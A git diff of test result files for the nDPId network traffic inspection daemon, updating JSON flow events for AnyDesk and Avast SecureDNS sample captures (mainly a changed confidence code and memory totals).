00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1591342199366,"pkt":"AAwplUdeAFBW5dKtCABFAAAse1UAAIAGRx4zU+7bwKiVgQBQqg9odWR8Kaac82AS+vDm4QAAAgQFtAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1591342199366,"pkt":"AFBW5dKtAAwplUdeCABFAAAoCJFAAEAGuebAqJWBM1Pu26oPAFApppzzaHVkfVAQ+vB4cwAA"} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} -01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1591342199201,"flow_last_seen":1591342199366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1591342199366,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1563,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} +01559{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1591342199201,"flow_last_seen":1591342199532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2863,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1591342199532,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"201999283915cc31cee6b15472ef3332","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=AnyNet Root CA, O=philandro Software GmbH, C=DE","subjectDN":"C=DE, O=philandro Software GmbH, CN=AnyNet Relay","fingerprint":"9E:08:D2:58:A9:02:CD:4F:E2:4A:26:B8:48:5C:43:0B:81:29:99:E3"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01180{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} +01180{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":6963,"packets-processed":6963,"total-skipped-flows":0,"total-l4-payload-len":2418022,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1591342255171} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6963/6963 @@ -23,9 +23,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6079213 bytes -~~ total memory freed........: 6079213 bytes -~~ total allocations/frees...: 125091/125091 +~~ total memory allocated....: 6212847 bytes +~~ total memory freed........: 6212847 bytes +~~ total allocations/frees...: 127853/127853 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 454 chars ~~ json string max len.......: 1564 chars diff --git a/test/results/avast_securedns.pcapng.out b/test/results/avast_securedns.pcapng.out index a4c77aa6e..15ae7de8a 100644 --- a/test/results/avast_securedns.pcapng.out +++ b/test/results/avast_securedns.pcapng.out @@ -2,210 +2,210 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625215624443} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625215624443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625215624443,"pkt":"eJS0JASgYDjgxTWgCABFAABDZa4AAH8ROYTAqAJktdYjleJyAbsAL0mrSMQBAAABAAAAAAAAATIJU2VDVVJlZG5TBWFWYXNUA0NvTQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625215624443,"flow_last_seen":1625215624443,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625215624443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625215624563,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625215624563,"pkt":"YDjgxTWgeJS0JASgCABFAADM0kQAADIRGWW11iOVwKgCZAG74nIAuMIZSMSBgAABAAEAAAAAATIJU2VDVVJlZG5TBWFWYXNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":3,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":215,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625241699450} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625241699450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625241699450,"pkt":"eJS0JASgYDjgxTWgCABFAABDEeYAAH8RjUzAqAJktdYjle8RAbsAL9I803MBAAABAAAAAAAAATIJU0VjdVJlRE5zBUF2YXNUA0NPbQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241699450,"flow_last_seen":1625241699450,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241699450,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625241699572,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625241699572,"pkt":"YDjgxTWgeJS0JASgCABFAADMLtkAADARvtC11iOVwKgCZAG77xEAuEqr03OBgAABAAEAAAAAATIJU0VjdVJlRE5zBUF2YXNUA0NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1625241701462,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625241701462,"pkt":"eJS0JASgYDjgxTWgCABFAABDEeoAAH8RjUjAqAJktdYjle2jAbsAL7p1TIkBAAABAAAAAAAAATIJU0VDVXJFZE5zBWF2QVN0A0NPTQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241701462,"flow_last_seen":1625241701462,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241701462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1625241701583,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625241701583,"pkt":"YDjgxTWgeJS0JASgCABFAADMMogAADIRuSG11iOVwKgCZAG77aMAuDLkTImBgAABAAEAAAAAATIJU0VDVXJFZE5zBWF2QVN0A0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625215624443,"flow_last_seen":1625215624563,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625241701583,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625215624443,"flow_last_seen":1625215624563,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625241701583,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":57970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1625241714666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625241714666,"pkt":"eJS0JASgYDjgxTWgCABFAABDXeQAAH8RQU7AqAJktdYjlfU3AbsAL3hGRwQBAAABAAAAAAAAATIJU2VjVVJlZG5zBUFWYVN0A0NPbQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625241714666,"flow_last_seen":1625241714666,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625241714666,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 